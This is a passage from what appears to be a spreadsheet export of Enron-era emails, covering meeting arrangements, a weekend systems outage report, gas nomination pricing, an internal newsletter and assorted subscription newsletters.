I shall be honored to chair a session during the Bachelier World Congress at_x000D_
College de France. Please, let me know which session you have in mind for me._x000D_
_x000D_
The repeat the Francfort presentation in Paris on October 4 &amp; 5 is fine with_x000D_
me. I think the Frankfurt presentation went quite well and it will be nice to_x000D_
work wih you and Alex again._x000D_
_x000D_
Regards_x000D_
_x000D_
_x000D_
Vince_x000D_
_x000D_
P.S.  I shall keep my office cell phone on all the time, in case you need to_x000D_
call me: 713 410 5396 </t>
  </si>
  <si>
    <t>Tue, 8 Jan 2002 21:01:58 -0800 (PST)</t>
  </si>
  <si>
    <t>A.Word.A.Day--hat trick</t>
  </si>
  <si>
    <t>hat trick (hat trik) noun_x000D_
_x000D_
   Three consecutive successes in a game or another endeavor. For example,_x000D_
   taking three wickets with three successive pitches by a bowler in a_x000D_
   game of cricket, three goals or points won by a player in a game of_x000D_
   soccer or ice hockey, etc._x000D_
_x000D_
[From cricket, from the former practice of awarding a hat to a bowler who_x000D_
dismissed three batsmen with three successive balls.]_x000D_
_x000D_
   "Can real estate investment trusts (REITs) pull off a hat trick?_x000D_
   They delivered an impressive total return of 29% in 2000 and a solid_x000D_
   11.5% in 2001, a period when the stock market was in a dive and the_x000D_
   economy was sliding into a recession. Sure, vacancy rates are up and_x000D_
   rents down, but REIT investors believe they will make money again_x000D_
   in 2002."_x000D_
   Michael Arndt, REITs Can Be a Roof Over Your Head, BusinessWeek_x000D_
   (New York), December 31, 2001._x000D_
_x000D_
Sponsors of today's AWAD are NannyTax, Inc., providing tax compliance_x000D_
services to employers of domestic help. For useful information and_x000D_
a free consultation, please visit: http://www.nannytax.com_x000D_
_x000D_
AND_x000D_
Eastern Informatics, providers of information technology solutions to the_x000D_
healthcare enterprise. Visit us at http://www.easterninformatics.com_x000D_
_x000D_
............................................................................_x000D_
We ought not to treat living creatures like shoes or household belongings,_x000D_
which when worn with use we throw away. -Plutarch, biographer (c. 46-120)_x000D_
_x000D_
Q: Tomorrow is my friend's birthday and I forgot to send her a gift. Help!_x000D_
A: Give the gift of words. Send a gift subscription of A.Word.A.Day at_x000D_
   http://wordsmith.org/awad/gift.html . It is the gift that keeps on_x000D_
   giving the whole year long, and beyond._x000D_
_x000D_
Pronunciation:_x000D_
http://wordsmith.org/words/hat_trick.wav_x000D_
http://wordsmith.org/words/hat_trick.ram</t>
  </si>
  <si>
    <t>Thu, 25 Oct 2001 14:41:55 -0700 (PDT)</t>
  </si>
  <si>
    <t>Weekend Outage Report for 10-26-01 through 10-28-01</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
------------------------------------------------------------------------------------------------------_x000D_
W E E K E N D   S Y S T E M S   A V A I L A B I L I T Y_x000D_
_x000D_
F O R_x000D_
_x000D_
October 26, 2001 5:00pm through October 29, 2001 12:00am_x000D_
------------------------------------------------------------------------------------------------------_x000D_
_x000D_
3 ALLEN CENTER POWER OUTAGE:_x000D_
Time:  Sat 10/27/2001 at  4:00:00 PM CT thru Sat 10/27/2001 at  8:00:00 PM CT_x000D_
	Sat 10/27/2001 at  2:00:00 PM PT thru Sat 10/27/2001 at  6:00:00 PM PT_x000D_
	Sat 10/27/2001 at  10:00:00 PM London thru Sun 10/28/2001 at  2:00:00 AM London _x000D_
From 4:00 - 8:00 p.m., Trizechan Properties has scheduled a shutdown of all electrical service at 3 Allen Center.  Enron Network Services will power down the 3AC network infrastructure between 3:30-4:00.  There will be no 3 Allen Center network access during the electrical maintenance and the outage will continue until ENS is able to power up all of the networking devices.  _x000D_
All 3AC and 2AC employees will have no telephone or voicemail service during outage period. When power is restored to building, systems will be powered back up and telco services tested for dial tone and connectivity._x000D_
If you need access to 3AC anytime that Saturday, you will need to contact Trizechan Properties beforehand with your security information (Jael Olson at 713-336-2300).  Anyone who attempts to enter the building on Saturday that is not on the list will be denied access._x000D_
_x000D_
_x000D_
_x000D_
SCHEDULED SYSTEM OUTAGES: _x000D_
_x000D_
ARDMORE DATA CENTER - FACILITY OPERATIONS: No Scheduled Outages._x000D_
_x000D_
AZURIX: No Scheduled Outages._x000D_
_x000D_
EB34 DATA CENTER - FACILITY OPERATIONS: No Scheduled Outages._x000D_
_x000D_
EDI SERVER: _x000D_
Impact:  CORP_x000D_
Time:  Sat 10/27/2001 at  11:00:00 PM CT thru Sun 10/28/2001 at  4:00:00 AM CT_x000D_
	Sat 10/27/2001 at    9:00:00 PM PT thru Sun 10/28/2001 at  2:00:00 AM PT_x000D_
	Sun 10/28/2001 at  5:00:00 AM London thru Sun 10/28/2001 at  10:00:00 AM London_x000D_
Outage:  EDI_QA disk re-org_x000D_
Environments Impacted:  EES_x000D_
Purpose: Improve disk utilization for future expansion._x000D_
Backout: Assign back to original disks._x000D_
Contact(s): 	John Kratzer  713-345-7672  _x000D_
 _x000D_
EES: _x000D_
Impact:  EES_x000D_
Time:  Sat 10/27/2001 at  6:00:00 PM CT thru Sun 10/28/2001 at  12:00:00 AM CT_x000D_
	Sat 10/27/2001 at  4:00:00 PM PT thru Sat 10/27/2001 at   10:00:00 PM PT_x000D_
	Sun 10/28/2001 at  12:00:00 AM London thru Sun 10/28/2001 at  6:00:00 AM London_x000D_
Outage:  Migrate EESHOU-FS1to SAN_x000D_
Environments Impacted:  EES_x000D_
Purpose: New Cluster server is on SAN and SAN backups_x000D_
This will provide better performance, server redundancy, and backups should complete without problems._x000D_
Backout: Take new server offline,_x000D_
Bring up old servers_x000D_
change users profiles back to original settings._x000D_
Contact(s): 	Roderic H Gerlach    713-345-3077_x000D_
 _x000D_
EI:  _x000D_
Impact:  All servers in 3AC floors 17 and 35: List provided below_x000D_
Time:  Sat 10/27/2001 at  3:00:00 PM CT thru Sat 10/27/2001 at  9:00:00 PM CT_x000D_
	Sat 10/27/2001 at  1:00:00 PM PT thru Sat 10/27/2001 at  7:00:00 PM PT_x000D_
	Sat 10/27/2001 at  9:00:00 PM London thru Sun 10/28/2001 at  3:00:00 AM London_x000D_
Outage:  3AC list of Server affected by outage_x000D_
Environments Impacted:  EI_x000D_
Purpose: There will be a complete power outage for the entire Three Allen Center Building._x000D_
Backout: No back out plan._x000D_
Contact(s): 	Tino Valor    713-853-7767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_x000D_
Impact:  CORP_x000D_
Time:  Fri 10/26/2001 at  7:00:00 PM CT thru Fri 10/26/2001 at  9:00:00 PM CT_x000D_
	Fri 10/26/2001 at  5:00:00 PM PT thru Fri 10/26/2001 at  7:00:00 PM PT_x000D_
	Sat 10/27/2001 at  1:00:00 AM London thru Sat 10/27/2001 at  3:00:00 AM London_x000D_
Outage:  Reboot HR-DB-4 to add new disks_x000D_
Environments Impacted:  All_x000D_
Purpose: We need to remove the old arrays because of reliability issues. _x000D_
Backout: Connect the old arrays back to DB-4 and reboot._x000D_
Contact(s): 	Brandon Bangerter 713-345-4904   _x000D_
		Mark Calkin             713-345-7831  _x000D_
		Raj Perubhatla       713-345-8016  281-788-9307_x000D_
		    		_x000D_
Impact:  CORP_x000D_
Time:  Sun 10/28/2001 at   1:45:00 AM CT thru Sun 10/28/2001 at    2:15:00 AM CT_x000D_
	Sat 10/27/2001 at 11:45:00 PM PT thru Sun 10/28/2001 at  12:15:00 AM PT_x000D_
	Sun 10/28/2001 at  7:45:00 AM London thru Sun 10/28/2001 at 8:15:00 AM London_x000D_
Outage:  sysAdmiral Outage_x000D_
Environments Impacted:  Corp_x000D_
Purpose: There is a possible bug in sysAdmiral when clocks adjust for daylight saving time, This is a precaution to take the system own during this time to prevent any possible problems that may occur._x000D_
Backout: We are only taking the services down on these machines no patches or upgrades, do not expect to see any problems. We expect the software company to be online provided we see any problems when we bring the systems back up._x000D_
Contact(s): 	Ryan Brennan  713-853-4545  _x000D_
		Brian Lindsay  713-853-6225  _x000D_
		Bruce Smith  713-853-6551  _x000D_
 _x000D_
SITARA:  No Scheduled Outages._x000D_
_x000D_
SUN/OSS SYSTEM: No Scheduled Outages._x000D_
_x000D_
TELEPHONY: _x000D_
Impact:  _x000D_
Time:  Sat 10/27/2001 at  4:00:00 PM CT thru Sat 10/27/2001 at  8:00:00 PM CT_x000D_
	Sat 10/27/2001 at  2:00:00 PM PT thru Sat 10/27/2001 at  6:00:00 PM PT_x000D_
	Sat 10/27/2001 at  10:00:00 PM London thru Sun 10/28/2001 at  2:00:00 AM London_x000D_
Outage:  Power Down Lucent Switch &amp; Voicemail @ 3AC_x000D_
Environments Impacted:  All_x000D_
Purpose: Scheduled power outage by 3AC Building Management._x000D_
Backout: _x000D_
Contact(s): 	Cynthia Siniard    713-853-0558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_x000D_
</t>
  </si>
  <si>
    <t>Wed, 6 Sep 2000 08:39:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'dfarmer@enron.com', 'jabretz@duke-energy.com'})</t>
  </si>
  <si>
    <t>Intraday Eastrans Nominations change for 9/6/00 and Nomination for_x000D_
 9/7/00</t>
  </si>
  <si>
    <t xml:space="preserve">As follow-up documentation for the Intraday sale on 9/6/00, the following _x000D_
states_x000D_
the pricing for the redeliveries:_x000D_
_x000D_
8500 MMBTU from Fuels Cotton Valley priced per Paragraph 1a of the Contract_x000D_
Price (per MMBTU) section in the Transaction Agreement._x000D_
10955 MMBTU at ETGS Carthage Hub Tailgate priced per Paragraph 1c of the_x000D_
Contract Price (per MMBTU) section in the Transaction Agreement_x000D_
10545 MMBTU at CIPCO/Mobile Beaumont  which is priced differently than _x000D_
Paragraph_x000D_
1b of the Contract Price (per MMBTU) section in the Transaction Agreement.  _x000D_
The_x000D_
price for 10545 MMBTU for 9/6/00 will be HSC Daily plus $.04/MMBTU._x000D_
_x000D_
Please confirm the above by replying to this E-Mail message._x000D_
---------------------- Forwarded by Marta K Henderson/Houston/PEFS/PEC on_x000D_
09/06/2000 01:07 PM ---------------------------_x000D_
_x000D_
_x000D_
Marta K Henderson_x000D_
09/06/2000 09:58 AM_x000D_
_x000D_
To:   Darrel F. Bane/EastTexas/PEFS/PEC@PEC, John A. Bretz/GCS/CEC/PEC@PEC, _x000D_
Chad_x000D_
      W. Cass/GCS/CEC/PEC@PEC, Michael R. Cherry/EastTexas/PEFS/PEC@PEC, Bruce_x000D_
      McMills/FtWorth/PEFS/PEC@PEC, William E. Speckels/GCS/CEC/PEC@PEC, Donna_x000D_
      C. Spencer/GCS/CEC/PEC@PEC, Julia A. Urbanek/GCS/CEC/PEC@PEC, Dora J._x000D_
      Levy/GCS/CEC/PEC@PEC, briley@enron.com, dfarmer@enron.com,_x000D_
      carlos.j.rodriguez@enron.com, Sharon Beemer/FtWorth/PEFS/PEC@PEC, Connie_x000D_
      Wester/EastTexas/PEFS/PEC@PEC_x000D_
cc:_x000D_
_x000D_
Subject:  Intraday Eastrans Nominations change for 9/6/00 and Nomination for_x000D_
      9/7/00_x000D_
_x000D_
Deliveries continue to be 30,000 MMBtu/dy_x000D_
_x000D_
The redeliveries will be:_x000D_
_x000D_
8500 from Fuels Cotton Valley_x000D_
10955 to HPL's Cartwheel Agreement at Carthage_x000D_
10545 at Mobil Beaumont_x000D_
_x000D_
Effective for 9/7/00, deliveries to Eastrans continue to be 30,000 MMBtu/dy_x000D_
_x000D_
The redeliveries will be:_x000D_
_x000D_
8500 from Fuels Cotton Valley_x000D_
21500 to HPL's Cartwheel Agreement at Carthage_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 29 Nov 2000 08:41:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'tracy.ralston@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'globalflash.recipients@enron.com'})</t>
  </si>
  <si>
    <t>Newsletter: GlobalFlash!</t>
  </si>
  <si>
    <t xml:space="preserve">Please see below the latest edition of GlobalFlash!  Apologies for the dela=_x000D_
y._x000D_
_x000D_
Regards,_x000D_
_x000D_
Tracy_x000D_
---------------------- Forwarded by Tracy Ralston/EU/Enron on 29/11/2000=20_x000D_
16:45 ---------------------------_x000D_
  =20_x000D_
=09_x000D_
=09_x000D_
=09From:  Enron Europe General Announcement @ ECT                          =_x000D_
=20_x000D_
24/11/2000 09:40_x000D_
=09_x000D_
_x000D_
Please respond to Jackie Gentle/LON/ECT_x000D_
To: ECT Asia Pacific, ECT Europe_x000D_
cc: =20_x000D_
_x000D_
Subject: Newsletter: GlobalFlash!_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
BUSINESS HIGHLIGHTS_x000D_
_x000D_
Nordic energy agreement with UPM-Kymmene_x000D_
Enron Nordic Energy and UPM-Kymmene Corp. have signed a two-year portfolio=_x000D_
=20_x000D_
management agreement covering UPM Kymmene's Nordic power portfolio. The=20_x000D_
Mid-Market desk in the Oslo office will assist UPM in optimising its=20_x000D_
portfolio of approximately 14 TWh. energydesk.com will provide UPM with the=_x000D_
=20_x000D_
risk management system used in the process. In addition, the agreement open=_x000D_
s=20_x000D_
the door for Enron Energy Services to explore a variety of opportunities=20_x000D_
within the company. The Nordic agreement is the first step towards a broade=_x000D_
r=20_x000D_
scope of co-operation with UPM on a European and Global basis. The total=20_x000D_
contract value is estimated to be $375 million._x000D_
_x000D_
UPM-Kymmene's nominal electricity resources total about 3000 MW, of which=_x000D_
=20_x000D_
2500 MW in Finland and about 500 MW in other countries. The group's power=_x000D_
=20_x000D_
procurement totals approximately 18 TWh per year, of which about 14 TWh in=_x000D_
=20_x000D_
Finland. Around 15 TWh/a is consumed by the group's own mills and the rest =_x000D_
is=20_x000D_
sold to the market._x000D_
_x000D_
http://www.upm-kymmene.com_x000D_
http://www.upm-kymmene.com/upm/energy/energybuild.html_x000D_
_x000D_
The deal was led by Sami Tenngren - Nordic Mid-Market, and was supported by=_x000D_
=20_x000D_
Magnus Groth - EES, Jukka Hormaluoma - energydesk.com, and Martin Rosell -=_x000D_
=20_x000D_
Legal._x000D_
_x000D_
Congratulations on a job well done to all those who worked so hard to put=_x000D_
=20_x000D_
this transaction into place........Thor Lien._x000D_
_x000D_
Australia_x000D_
Despite heavy flooding in NSW, the weather is looking up for Enron=20_x000D_
Australia.  Last week, the Sydney Office launched online Hong Kong weather=_x000D_
=20_x000D_
derivatives  and the Sydney weather node traded on EnronOnline in the US ti=_x000D_
me=20_x000D_
zone.  With this precedent, we hope to support the takeoff of global weathe=_x000D_
r=20_x000D_
on EnronOnline. =20_x000D_
_x000D_
The Coal Group in Sydney has suddenly become very popular. There is no doub=_x000D_
t=20_x000D_
that a recent sale to AES for the plant at Barbers Point, Hawaii is the rea=_x000D_
l=20_x000D_
reason.  Coal purchases during year 2000 have been concluded with most majo=_x000D_
r=20_x000D_
producers in Indonesia and Australia.  We will soon be loading our first=20_x000D_
shipment from China. Deliveries to Nippon Steel in Japan are underway. Also=_x000D_
,=20_x000D_
a shipment to a large power utility in Japan will take place in early 2001._x000D_
_x000D_
Off-shore wind plans_x000D_
Enron has entered into agreement to purchase the development assets of a 30=_x000D_
=20_x000D_
MW offshore wind project in the UK.  The Harwich project, situated in=20_x000D_
Gunfleet Sands approximately eight kilometres offshore in the North Thames=_x000D_
=20_x000D_
Estuary is believed to represent one of the first serious investments in th=_x000D_
e=20_x000D_
development of offshore wind energy in the UK.=20_x000D_
_x000D_
Weekly EnronOnline Figures_x000D_
Below are the latest figures for EnronOnline as of November 20, 2000._x000D_
_x000D_
* Total Life to Date Transactions &gt;  450,000_x000D_
* Life to Date Notional Value of Transactions &gt; $253 billion_x000D_
_x000D_
_x000D_
SAP SYNCHRONISATION AND ALLOCATION PROJECT_x000D_
_x000D_
Recently we updated you on the SAP Synchronisation and Allocation project. =_x000D_
=20_x000D_
The changes being made are designed to assist business units in tracking an=_x000D_
d=20_x000D_
controlling costs.=20_x000D_
_x000D_
What's changing?=20_x000D_
_x000D_
New Project Codes:  =20_x000D_
_x000D_
We will be moving from the current project tracking mechanism, Internal=20_x000D_
Orders (I/O), to using WBS (Work Breakdown Structure) .   These new codes=_x000D_
=20_x000D_
facilitate better project reporting and are grouped hierarchically into=20_x000D_
structures. These groupings are based on project organisation, phasing or=_x000D_
=20_x000D_
activities and provides a project overview.  The PS Module within SAP=20_x000D_
provides for a common template offering some key advantages: =20_x000D_
_x000D_
 -  provides consistency across projects and business units=20_x000D_
 -  facilitates comparison between projects=20_x000D_
 -  provides a logical grouping of code structures_x000D_
_x000D_
This tracking mechanism will also be used for capital projects or expense=_x000D_
=20_x000D_
projects that require cost tracking.=20_x000D_
_x000D_
What about training?_x000D_
_x000D_
To ensure your comfort with the changes listed above, training materials ar=_x000D_
e=20_x000D_
currently under development by the project team.  Core training is schedule=_x000D_
d=20_x000D_
to be December 4 - December 22 and training notifications will be sent=20_x000D_
shortly to those users who are affected by these changes.  These=20_x000D_
notifications will come via an email from European T&amp;D and will enable you =_x000D_
to=20_x000D_
register for available classes._x000D_
_x000D_
_x000D_
ENRON IN THE PRESS_x000D_
"The name of Enron may be unfamiliar in Japan, but it should not stay that=_x000D_
=20_x000D_
way for long.........Joseph Hirl, president of Enron Japan, says: "We don't=_x000D_
=20_x000D_
go in and try to destroy markets - we go in and create them."  Some of the=_x000D_
=20_x000D_
company's potential customers and business partners may still need to be=20_x000D_
persuaded of that, but Enron has a large stock of experience to reassure=20_x000D_
them".   Financial Times_x000D_
_x000D_
_x000D_
EUROPE TRIUMPHS AT THE MANAGEMENT CONFERENCE_x000D_
We are pleased to report a great showing by Enron Europe people in the=20_x000D_
various competitions organised as part of this year's Enron Management=20_x000D_
Conference in San Antonio:_x000D_
_x000D_
Golf:        Brian Stanley was a member of the winning team=20_x000D_
Tennis:  Rob Saltiel won and Steve Elliott was runner up._x000D_
Road Rally: Jackie Gentle's team was third.  [We beat Ken Rice in his Ferra=_x000D_
ri=20_x000D_
and we stopped for ice-cream.  Hee! Hee! ....Ed.]_x000D_
Road Rally:         Eric Shaw &amp; Riccardo Bortolotti won the fastest rental=_x000D_
=20_x000D_
car in the slalom section._x000D_
_x000D_
Everyone is strangely silent on who won (or lost) the after dinner poker ga=_x000D_
me=20_x000D_
..........._x000D_
_x000D_
_x000D_
NEW STARTERS_x000D_
Please join us in extending a warm welcome to this week's new members of=20_x000D_
staff:_x000D_
_x000D_
Andrew Davison (Global Finance), Nick Arnold (Power Trading UK), Steven Los=_x000D_
=20_x000D_
(Transaction Support), Melanie Shuckard (Coal Trading), Mark Sheey (Fin Ops=_x000D_
=20_x000D_
Fin Rptg), Toni Duff (Enron Broadband Trading), Marc Hammerson (Legal), Jos=_x000D_
e=20_x000D_
Leitao (EES Middle Market), Mustafa Hussein (Govt &amp; Regulatory Affairs),=20_x000D_
Brenda Van de Peer (Global Operations), Lorna Hyde (HR A&amp;A), Jacob Meins=20_x000D_
(European Gas Trading), Mark Leahy (EnronCredit.com)_x000D_
_x000D_
_x000D_
TELEPHONY UPDATE_x000D_
The European Telephony Group have added a new facility to the Enron House=_x000D_
=20_x000D_
Telephone System, which will give staff using mobile phones the ability to=_x000D_
=20_x000D_
have their conversations recorded.  This is primarily aimed at Traders who=_x000D_
=20_x000D_
may need confirmation of a conversation for a transaction, which is not mad=_x000D_
e=20_x000D_
from an Enron House phone.  To use the facility out users should dial 37373=_x000D_
=20_x000D_
from their Enron Mobile, at the sound of the dialtone they should dial as i=_x000D_
f=20_x000D_
they would for any call from inside Enron House -- i.e. dial '9' and the=20_x000D_
relevant number to talk to the client.  The Telephony Group can retrieve th=_x000D_
e=20_x000D_
conversation on demand and replay to the trader._x000D_
_x000D_
_x000D_
UPDATE FROM AYSCOUGH TRAVEL_x000D_
Please be advised, should you miss one leg of your journey and have onward=_x000D_
=20_x000D_
flight connections there is a strong possibility the airline will cancel th=_x000D_
e=20_x000D_
reservations, if they have not been advised accordingly.  Airlines are=20_x000D_
constantly monitoring for passengers who fail to make their reservation or=_x000D_
=20_x000D_
who hold multiple bookings on similar routings. In order to increase their=_x000D_
=20_x000D_
passenger revenue they will delete duplicate or onward bookings and sell th=_x000D_
e=20_x000D_
seats at a higher fare.  Please advise the Implant Office of any amendments=_x000D_
=20_x000D_
to your travel arrangements as soon as they are available. This is imperati=_x000D_
ve=20_x000D_
if your changes arise during your business trip.  Ayscough Travel thanks yo=_x000D_
u=20_x000D_
in advance for your assistance!_x000D_
_x000D_
_x000D_
CORRECTION: CHAIRMAN'S AWARD_x000D_
We would like to make an apology to all the employees who were incorrectly=_x000D_
=20_x000D_
listed as London based staff in last week's GlobalFlash.  Please see below=_x000D_
=20_x000D_
for the correct listings:_x000D_
_x000D_
Paul Bates - Teesside=20_x000D_
Paula Bowman - Teesside_x000D_
John Brodie - Teesside_x000D_
Peter Burke - Teesside_x000D_
Terry Bye - Teesside_x000D_
Sue Caswell - Teesside_x000D_
Eric Chamberlain - Teesside_x000D_
Graham Taylor - Teesside_x000D_
Caroline Cunliffe - Teesside=09Sarah Grimes - Teesside_x000D_
=09Tim Roy  - Teesside_x000D_
=09Terry Waldron  - Teesside_x000D_
=09Trevor High - Teesside_x000D_
=09Christine Hill - Teesside_x000D_
=09Mike Mason  - Teesside_x000D_
=09Geoff Milward - Teesside_x000D_
=09Richard Murray - Teesside_x000D_
=09Mike Mussett - Teesside=09Colin Telfer - Teesside_x000D_
=09=09Dave Shaw  - Teesside_x000D_
=09=09Kevin Westwood  - Teesside_x000D_
=09=09Judith Wong - Teesside_x000D_
=09=09Gary Douthwaite - Teesside_x000D_
=09=09Paul Frankland - Teesside_x000D_
=09=09Hans-Mart Groen - Amsterdam_x000D_
=09=09Jose Luis Novo - Madrid_x000D_
=09=09_x000D_
_x000D_
_x000D_
AMERIFLASH BUSINESS HIGHLIGHTS_x000D_
_x000D_
Coal Trading_x000D_
The liquidity in trading of the Standard European Coal Agreement has=20_x000D_
increased significantly over the last 6 weeks.  Many counterparties that=20_x000D_
previously opted to stay on the sidelines finally chose to join the game.=_x000D_
=20_x000D_
Since the contract's inception at the beginning of the year, Enron has trad=_x000D_
ed=20_x000D_
a total of 5.3 million tons against the SECA contract, of which 3.8 million=_x000D_
=20_x000D_
tons has been traded via EnronOnline since July 2000.  We are 5.3 million=_x000D_
=20_x000D_
tons of a total traded market of 5.8 million tons._x000D_
_x000D_
Principal Investments_x000D_
Tridium Inc., the leading provider of Internet-based automation=20_x000D_
infrastructure solutions, announced the close of a $20 million round of=20_x000D_
capital funding. The funds will be used to increase Tridium=01,s sales and=_x000D_
=20_x000D_
technical support offices in North America, expand its operations into Euro=_x000D_
pe=20_x000D_
and Asia, and enhance its technology and products. kRoad Ventures, L.P. and=_x000D_
=20_x000D_
Enron North America each contributed $10 million in venture capital._x000D_
_x000D_
Corporate Development_x000D_
Allegheny Energy Supply Company, LLC, a wholly owned subsidiary of Alleghen=_x000D_
y=20_x000D_
Energy, Inc., announced the signing of a definitive agreement under which=_x000D_
=20_x000D_
Allegheny Energy Supply will purchase three Enron natural gas-fired merchan=_x000D_
t=20_x000D_
generating facilities. The acquisition is expected to close in the 2nd=20_x000D_
quarter of 2001._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 21 Mar 2000 09:45:00 -0800 (PST)</t>
  </si>
  <si>
    <t>CGLF for feb</t>
  </si>
  <si>
    <t>i added deal 223021, cglf k#66281 for feb to sitara.  what is this capacity _x000D_
for?  its FTS 1 at rate $1.1600</t>
  </si>
  <si>
    <t>Thu, 30 Nov 2000 05:36:00 -0800 (PST)</t>
  </si>
  <si>
    <t>EMAZING Health &amp; Fitness Tip of the Day - Insoluble Fiber</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JobsOnline is giving away $10,000 instant cash!_x000D_
=09=09JobsOnline is one of the Internet's leading sites for employment info=_x000D_
rmation=20_x000D_
and career resources. Search their extensive database of over 200,000 job=_x000D_
=20_x000D_
postings to make your next career move. And use the site=01,s valuable care=_x000D_
er=20_x000D_
resources to assist you in your job search =01) or to succeed in your curre=_x000D_
nt=20_x000D_
position. Click  here for more details.  =20_x000D_
=09=09_x000D_
=09=09_x000D_
=09=09_x000D_
=09=09Health &amp; Fitness Tip of the Day_x000D_
=09=09Thursday November 30, 2000_x000D_
=09=09_x000D_
=09=09Insoluble Fiber =20_x000D_
=09=09_x000D_
=09=09Insoluble fiber is a type of carbohydrate that is found exclusively i=_x000D_
n plant=20_x000D_
products. It's the part of the plant that is not fully digested, thus addin=_x000D_
g=20_x000D_
bulk to feces. This promotes the movement of fecal material through the=20_x000D_
intestines, which promotes bowel regularity. Insoluble fiber can be found i=_x000D_
n=20_x000D_
fruits, vegetables, brown rice, wheat bran, popcorn, nuts, whole wheat, and=_x000D_
=20_x000D_
many other plant-derived foods._x000D_
=09=09_x000D_
=09=09- Marc Ellman_x000D_
=09=09_x000D_
=09=09Email  this tip to a friend - Browse  the Archives_x000D_
=09=09_x000D_
=09=09[IMAGE]_x000D_
=09=09_x000D_
=09=09E-greetings that are EMAZING!_x000D_
=09=09Easy, fun and FREE...EMAZING greetings are the cool way to say what y=_x000D_
ou've=20_x000D_
gotta say. =20_x000D_
=09=09_x000D_
=09=09Holiday gift shopping made easy..._x000D_
=09=09It's Flooz!  The online gift currency you send by email! =20_x000D_
=09=09_x000D_
=09=09How Cool Are You?_x000D_
=09=09Click here to play the CERTS Confidence Quiz and find out. Be Certain=_x000D_
 with=20_x000D_
CERTS. =20_x000D_
=09=09_x000D_
=09=09Don't spend Christmas without the Grinch..._x000D_
=09=09Save up to 40% at Amazon's Dr. Seuss Shop! =20_x000D_
=09=09_x000D_
=09=09Want Coupons, FREESTUFF, &amp; More? Click Into CoolSavings_x000D_
=09=09CoolSavings is the place to save BIG on all your favorite things from=_x000D_
 all=20_x000D_
your favorite stores and online retailers this Holiday season. =20_x000D_
=09=09_x000D_
=09=09=20_x000D_
=09=09_x000D_
=09=09_x000D_
=09=09[IMAGE]_x000D_
=09=09[IMAGE]_x000D_
=09=09_x000D_
=09=09_x000D_
=09=09   =20_x000D_
=09=09_x000D_
=09=09Tip Gift_x000D_
=09=09HEALTH BOOK OF THE DAY_x000D_
=09=09Robin A. McKenzie: 7 Steps to a Pain-Free Life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_x000D_
=09=09_x000D_
=09=09Quote_x000D_
=09=09QUOTE  OF THE DAY_x000D_
=09=09He was a self-made man who owed his lack of success to nobody._x000D_
=09=09- Joseph Heller, Catch-22_x000D_
=09=09_x000D_
=09=09=20_x000D_
=09=09_x000D_
=09=09[IMAGE]_x000D_
=09=09[IMAGE]_x000D_
=09=09_x000D_
=09=09  =20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Sat, 30 Sep 2000 01:02:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'tjaeckle@jaecklewholesale.com'})</t>
  </si>
  <si>
    <t>This weeks pick</t>
  </si>
  <si>
    <t>This week I am picking San Diego to lose to the Rams.</t>
  </si>
  <si>
    <t>Thu, 1 Feb 2001 06:01:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'gkansagor@tr.com'})</t>
  </si>
  <si>
    <t>frozenset({'cwall@tr.com'})</t>
  </si>
  <si>
    <t>TR's State NewsWire 2/1/01 P.M. Edition</t>
  </si>
  <si>
    <t xml:space="preserve">Telecommunications Reports presents . . . . . TR's State NewsWire_x000D_
February 1, 2001 P.M. Edition_x000D_
_x000D_
STATES_x000D_
WASHINGTON -- WUTC sets line sharing, OSS transition, collocation prices_x000D_
_x000D_
CONNECTICUT -- DPUC tells WorldCom to change collect call notification_x000D_
policy_x000D_
MICHIGAN -- Gov. Engler makes high technology a priority_x000D_
NORTH DAKOTA -- House passes bill to adopt UETA_x000D_
MISSISSIPPI -- UETA bill set to reach Senate floor_x000D_
NEBRASKA -- Judiciary Committee to consider cellphone bill_x000D_
MICHIGAN -- Legislation would prohibit telemarketers from blocking_x000D_
Caller ID_x000D_
HAWAII -- Bill would prohibit 'cybersquatting'_x000D_
TENNESSEE -- Filing fees for telephone cooperatives would rise under_x000D_
bill_x000D_
NEW YORK -- Bill would require written notice before terminating service_x000D_
contracts_x000D_
UTAH -- PSC to hold technical conference on number conservation_x000D_
WASHINGTON -- WUTC sets workshop on customer notice rules_x000D_
FLORIDA -- New '386' area code to take effect soon_x000D_
NEW YORK -- Time Warner Cable brings VoIP test to Rochester_x000D_
_x000D_
SECTION 251/252_x000D_
WASHINGTON_x000D_
WUTC sets line sharing, OSS transition, collocation prices_x000D_
_x000D_
The Utilities and Transportation Commission has set a $4 flat fee for_x000D_
use of the high-frequency portion of the loops in operating areas_x000D_
service by Qwest Corp. and Verizon Northwest, Inc.  The commission also_x000D_
determined that Verizon may recover up to $1.98 million and Qwest may_x000D_
recover up to $5.5 million of their operation support system (OSS)_x000D_
transition costs.  In addition, the commission addressed several_x000D_
collocation elements in its order, which was issued yesterday._x000D_
_x000D_
This decision addresses Part A of a second generic proceeding to_x000D_
determine costs and prices for network elements.  During the first_x000D_
generic proceeding, the commission set the costs and prices for_x000D_
unbundled network elements (UNEs), including the unbundled loop.  The_x000D_
first proceeding, which was split into three phases, set costs and_x000D_
established deaveraged prices for interconnection and UNEs.  The second_x000D_
proceeding addresses network elements not included in the first_x000D_
proceeding._x000D_
_x000D_
The WUTC rejected the proposal espoused by many of the competitive local_x000D_
exchange carriers (CLECs) for an exemption from making any contribution_x000D_
to the recurring costs of the loop.  Instead, the WUTC set a $4 flat fee_x000D_
for line sharing.  The commission also said it was premature to_x000D_
determine whether a non-zero price for the high frequency spectrum UNE_x000D_
would lead to overearning for Qwest or Verizon._x000D_
_x000D_
When the commission examined cost recovery issues related to the_x000D_
modifications Qwest and Verizon made to their OSSs to support a_x000D_
competitive environment, it determined that Verizon's proposed rates_x000D_
were just and reasonable.  Verizon's nonrecurring charge for OSS_x000D_
transition cost recovery is $3.27 per local service request, and its_x000D_
nonrecurring charge for OSS transaction costs recovery is $3.76 per_x000D_
local service request._x000D_
_x000D_
The WUTC rejected Qwest's proposed OSS transition recovery costs and_x000D_
ordered the company to charge OSS transition and transaction rates equal_x000D_
to Verizon's approved rates.  The commission noted that Qwest's proposed_x000D_
